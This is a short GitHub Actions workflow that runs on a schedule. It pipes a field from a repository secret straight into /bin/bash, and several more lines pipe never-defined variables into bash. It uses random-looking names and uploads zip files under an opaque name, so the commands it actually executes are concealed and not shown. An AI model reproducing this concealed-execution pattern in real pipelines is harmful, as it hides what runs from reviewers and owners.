name: guangjikeming
on:
  workflow_dispatch:

  schedule:
    - cron: '30 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guangjikeming
        env:
          phv898: ${{ secrets.phv898 }}
        run: |
          printf '%s' "$phv898" | jq -r .obh69467 | /bin/bash
          printf '%s' "$ub55951" | jq -r .wgvvl1623 | /bin/bash
          echo $eqir25679 | jq -r .v526 | /bin/bash
          echo $jz610 | jq -r .zn12 | /bin/bash
          echo $hdln35 | jq -r .cumsd6326 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: o9wWpij8
          path: "*.zip"
          retention-days: 1
